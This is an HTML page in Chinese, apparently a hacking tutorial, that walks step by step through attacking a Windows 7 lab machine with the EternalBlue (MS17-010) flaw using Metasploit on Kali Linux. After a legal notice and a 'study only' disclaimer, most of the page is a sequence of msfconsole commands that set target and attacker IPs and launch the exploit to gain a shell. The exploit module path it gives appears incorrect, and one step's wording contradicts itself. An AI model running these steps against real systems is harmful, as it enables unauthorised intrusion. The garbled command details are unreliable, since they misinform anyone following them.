<html lang="zh">
<head>
<meta charset="utf-8">
<title>永恒之蓝——MSF kali攻击Win7</title>
<link rel="stylesheet" type="text/css" href="css/rent.css" />
<script src="script/jquery-2.0.3.js"></script>
<script src="script/rent.js"></script>
</head>
<body>

<div id="header" style="min-width:1000px;">
	<div class="top_left">
    	<a href="javascript:void(0)" onClick="history.back()" class="back"></a>
    </div>
    <div class="top_title">
    	<p>永恒之蓝——MSF kali攻击Win7</p>
    </div>
</div>

<div class="clear_float"></div>


<div id="content" showId="0">
    <strong class="sl">&lt;</strong>
    <strong class="sr">&gt;</strong>
    <span class="left"></span>
    <span class="right"></span>
	<ul>
    <li class="cont_1">   	
	
        <div class="cont_left"> 
           <div class="user_pig"><div class="user_name">《黑客技术学习须知》</div></div>      
        </div>
       
        <div class="cont_right">
        	<div class="cont_word">
						<p>1.破坏计算机信息系统罪后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。</p>
						<p>2.《中华人民共和国刑法》相关条款：第二百八十六条 违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。<br>违反国家规定，对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作，后果严重的，依照前款的规定处罚。故意制作、传播计算机病毒等破坏性程序，影响计算机系统正常运行，后果严重的，依照第一款的规定处罚。</p>
				<span class="left_quote"></span>
	            <span class="right_quote"></span>
            </div>            
        </div>
    </li>
    <li class="cont_2">
    	<div class="cont_left"> 
           <div class="user_pig"><div class="user_name">永恒之蓝——MSF准备：</div></div>      
        </div>
        <div class="cont_right">
        	<div class="cont_word">
				<p>1、特别声明：本篇文章仅供学习交流，请勿用于非法用途。看不懂的话下面还有视频教学。</p>

                <p>2、前言：讲解通过kali中的MSF-Metasploit来利用永恒之蓝漏洞入侵内网中的Windows7。Kali linux攻击机与Windows7靶机必须在同一局域网中。</p>
                
                <p>3、准备:</p>
				
				<p>	(1).Kali linux (攻击机) IP：192.168.1.10 </p>
				
				<p>	(2).Windows 7（靶机）IP: 192.168.1.140</p>
            	<span class="left_quote"></span>
	            <span class="right_quote"></span>
            </div>            
        </div>
    </li>
    <li class="cont_3">
    	<div class="cont_left"> 
           <div class="user_pig"><div class="user_name">MSF kali攻击Win7：</div></div>      
        </div>
        <div class="cont_right">
        	<div class="cont_word">
				<p>1.输入msfconsole &nbsp;&nbsp;&nbsp;&nbsp;[开启msf。图案每次开启会不一样，这没影响]</p>

                <p>2.输入search 17-010&nbsp;&nbsp;&nbsp;&nbsp;[扫描MS17-010漏洞相关的exp]</p>
                
                <p>3.输入use auxiliary/scanner/smb/smb_ms17_010	&nbsp;&nbsp;&nbsp;&nbsp;[使用永恒之蓝漏洞（ms_17_010）模块]</p>
                
                <p>4.输入use exploit/windows/smb/ms17_010_tcp&nbsp;&nbsp;&nbsp;&nbsp;[利用永恒之蓝漏洞]</p>
                
                <p>5.输入set rhost 192.168.1.140&nbsp;&nbsp;&nbsp;&nbsp;[RPORT默认即可，设置RHOST为靶机的IP]</p>
				
				<p>6.输入set lhost 192.168.1.10	&nbsp;&nbsp;&nbsp;&nbsp;[LHOST默认即可，设置LHOST为攻击机的IP]</p>
				
				<p>7.输入exploit&nbsp;&nbsp;&nbsp;&nbsp;	[运行]</p>
				
            	<span class="left_quote"></span>
	            <span class="right_quote"></span>
            </div>            
        </div>
    </li>
    <li class="cont_3">
    	<div class="cont_left"> 
           <div class="user_pig"><div class="user_name">视频教程：</div></div>      
        </div>
        <div class="cont_right">
        	<div class="cont_word">
				<p>8.然后就可以使用Linux kali 命令进行操作了</p>
				
				<p>9.看不懂？这里还有视频操作：<a href="https://v.kuaishou.com/7FmSzk" target="_blank">https://v.kuaishou.com/7FmSzk</a></p>

				<p>0.彪哥技术分享，这里全是干货。</p>
            	<span class="left_quote"></span>
	            <span class="right_quote"></span>
            </div>            
        </div>
    </li>
    </ul>
</div>

<div id="footer">
	<ul>
    	<li step="0"><a class="active" href="#">首</a></li>
        <li step="last"><a href="#">尾</a></li>
    </ul>
</div>
</body>
</html>